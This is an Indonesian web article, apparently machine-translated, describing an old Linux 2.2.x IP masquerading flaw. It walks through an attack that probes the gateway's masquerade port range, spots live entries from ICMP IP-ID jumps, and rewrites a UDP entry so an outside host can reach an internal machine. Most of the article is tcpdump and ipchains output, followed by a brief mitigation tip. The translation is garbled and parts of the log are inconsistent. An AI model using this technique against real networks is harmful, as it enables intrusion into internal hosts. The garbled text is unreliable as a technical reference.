Keamanan IP kamuflase kernel dan cara kerja

Keamanan IP kamuflase kernel memiliki lubang keamanan

Ada kerentanan keamanan serius dalam implementasi kamuflase IP dari sistem Linux 2.2.x kernel. Ada kurangnya inspeksi serius terhadap koneksi dalam kode inti yang relevan. Penyerang dapat menulis ulang entri penyamaran UDP di inti sehingga paket UDP penyerang dapat dialihkan ke mesin internal.

Ketika IP internal ingin mengakses server DNS dari jaringan eksternal, ketika paket UDP yang dikirim melewati gateway IP masquerading, kernel akan menambahkan entri untuk merekam koneksi.

Misalnya, paket UDP yang terhubung dari port 1035 dari host internal A ke port 53 dari host eksternal C. Kernel menggantikan alamat sumber paket ini dengan IP gateway yang disamarkan (B). Port, standarnya adalah dari port 61000 ke port 65096, jadi secara teori, intinya dapat menangani koneksi kamuflase 4096 TCP / UDP secara bersamaan.

> Host A: 1035-> GW B: 63767-> Host C: 53

BAGAIMANA CARA KERJA?

Ketika jaringan eksternal mengirimkan paket UDP ke gateway tersamar, Linux IP samaran hanya memutuskan apakah paket UDP ini harus diteruskan ke jaringan internal berdasarkan port target. 

Baca juga : 3389 port mengapa digunakan untuk peretasan

Jika port target memiliki entri yang sesuai di tabel koneksi kamuflase yang telah ditetapkan, port ip akan memperbarui dan source port dalam paket ini ke ip host jarak jauh dan port entri yang sesuai. Selama penyerang menilai port dari gateway masquerading, ia dapat menggunakan IP dan port-nya sendiri untuk menulis ulang tabel koneksi masquerading. 

Rentang port yang digunakan oleh gateway masquerade untuk melayani koneksi masquerade biasanya dari 61000 hingga 65096, sehingga mudah bagi penyerang eksternal untuk menentukan port mana yang telah digunakan untuk membangun koneksi. 

Seorang penyerang dapat mengirim paket deteksi UDP ke port-port ini yang menyamar sebagai gateway, dan kemudian memeriksa ID IP paket respons ICMP port tersebut. 

Setiap host mengirim paket, ID IP dalam tumpukan TCP / IP akan meningkat satu per satu. Oleh karena itu, respons ICMP yang dikirim ke port yang digunakan untuk penyamaran IP akan memiliki ID IP host internal.

EXPLOITING

ID ini biasanya akan jauh berbeda dari ID IP saat ini dari host gateway, biasanya di atas 1000. Contoh berikut menunjukkan proses mengeksploitasi kelemahan:

Host A adalah host internal (192.168.1.100)

Host B adalah gateway tersamar (192.168.1.1 / 10.0.0.1)

Host C adalah server DNS eksternal (10.0.0.25).

Host X adalah IP penyerang eksternal (10.10.187.13)

Sebelum deteksi, jalankan perintah pada masquerade gateway: ipchains -L -M -n untuk menampilkan tabel koneksi masquerade saat ini. Situasi:

> UDP 03: 39.21 192.168.1.100 10.0.0.25 1035 (63767) -> 53

saat ini koneksi yang dikirim dari port 1035 dari 192.168.1.100 ke port 53 dari 10.0.0.25, port masquerading adalah 63767

[dari penyerang Hasil tcpdump di mesin]

(Untuk membuatnya lebih mudah untuk melihat masalah, di sini kita mengatur port sumber dari semua paket deteksi ke 12345)

[Deteksi kami akan mulai dari port 61000, kami telah menghilangkan beberapa hasil sebelumnya]

10.0.0.1> 10.10.187.13: icmp: 10.0.0.1 udp port 63762 tidak dapat dijangkau [tos 0xd8] (ttl 245, id 13135)

10.10.187.13.12345> 10.0.0.1.63763: udp 0 (DF) [tos 0x18] (ttl 254, id 23069)

10.0.0.1> 10.10.187.13: icmp: 10.0.0.1 udp port 63763 tidak dapat dijangkau [tos 0xd8] (ttl 245, id 13136)

10.10.187.13.12345> 10.0.0.1.63764: udp 0 (DF) [tos 0x18] (ttl 254, id 23070)

10.0.0.1> 10.10.187.13: icmp: 10.0.0.1 udp port 63764 tidak dapat dijangkau [tos 0xd8] (ttl 245, id 13137)

10.10.187.13.12345> 10.0.0.1.63765: udp 0 (DF) [tos 0x18] (ttl 254, id 23071)

10.0.0.1> 10.10.187.13: icmp: 10.0.0.1 udp port 63765 tidak dapat dijangkau [tos 0xd8] (ttl 245, id 13138)

10.10.187.13.12345> 10.0.0.1.63766: udp 0 (DF) [tos 0x18] (ttl 254, id 23074)

10.0.0.1> 10.10.187.13: icmp: 10.0.0.1 udp port 63766 tidak dapat dijangkau [tos 0xd8] (ttl 245, id 13139)

10.10.187.13.12345> 10.0.0.1. 63 767: 0 UDP (DF) [KL 0x18] (TTL 254, ID 23083)

10.0.0.1> 10.10.187.13: ICMP: 10.0.0.1 tidak dapat dijangkau Port UDP 63767 [KL 0xD8] (TTL 244, ID 17205)

ID paket di atas adalah 17205, dan perbedaan antara paket tersebut dan 13139 telah melampaui 4000, yang berarti bahwa kami telah menemukan koneksi yang dipura-pura. !!!

10.10.187.13.12345> 10.0.0.1.63768: udp 0 (DF) [tos 0x18] (ttl 254, id 23084)

10.0.0.1> 10.10.187.13: icmp: 10.0.0.1 udp port 63768 tidak dapat dijangkau [tos 0xd8] (ttl 245, id 13140)

10.10.187.13.12345> 10.0.0.1.63769: udp 0 (DF) [tos 0x18] (ttl 254, id 23088)

10.0.0.1> 10.10.187.13: icmp: 10.0.0.1 udp port 63769 tidak dapat dijangkau [tos 0xd8] (ttl 245, id 13141)

10.10.187.13.12345> 10.0.0.1.63770: udp 0 (DF) [tos 0x18] (ttl 254, id 23090)

10.0.0.1> 10.10.187.13: icmp: 10.0.0.1 udp port 63770 tidak dapat dijangkau [tos 0xd8] (ttl 245, id

13142) 10.10.187.13.12345> 10.0.0.1.63771: udp 0 (DF) [tos 0x18] (ttl 254, id 23091)

10.0.0.1> 10.10.187.13: icmp: 10.0.0.1 udp port 63771 tidak dapat dijangkau [tos 0xd8] (ttl 245, id 13143)

10.10.187.13.12345> 10.0.0.1.63771: udp 0 (DF) [tos 0x18] (ttl 254, id 23092)

10.0.0.1> 10.10.187.13: icmp: 10.0.0.1 udp port 63772 tidak dapat dijangkau [tos 0xd8] (ttl 245, id 13144)

[akhir kami yang terdeteksi port 65096, kami telah menghilangkan beberapa hasil]

Sekarang mari kita periksa situasi tabel koneksi masquerading dari gateway masquerading:

ipchains -L -M -n

> UDP 04: 35.12 192.168.1.100 10.10.187.13 1035 (63767) -> 12345

Anda dapat melihat bahwa host jarak jauh telah digantikan oleh serangan IP penyerang adalah 10.10.187.13, dan port target juga diganti dengan port sumber yang digunakan untuk deteksi penyerang: 12345.

Baca juga : Cara hack WiFi airplane terbaru

Sekarang penyerang dapat mengirim data UDP dari port sumber 12345 ke port 1035 dari host internal.

Uggest Saran:

Untuk masalah mengakses DNS eksternal, solusi yang memungkinkan adalah mengaturnya di gateway yang disamarkan. Server nama domain yang di-cache, dan kemudian melarang penyamaran paket UDP.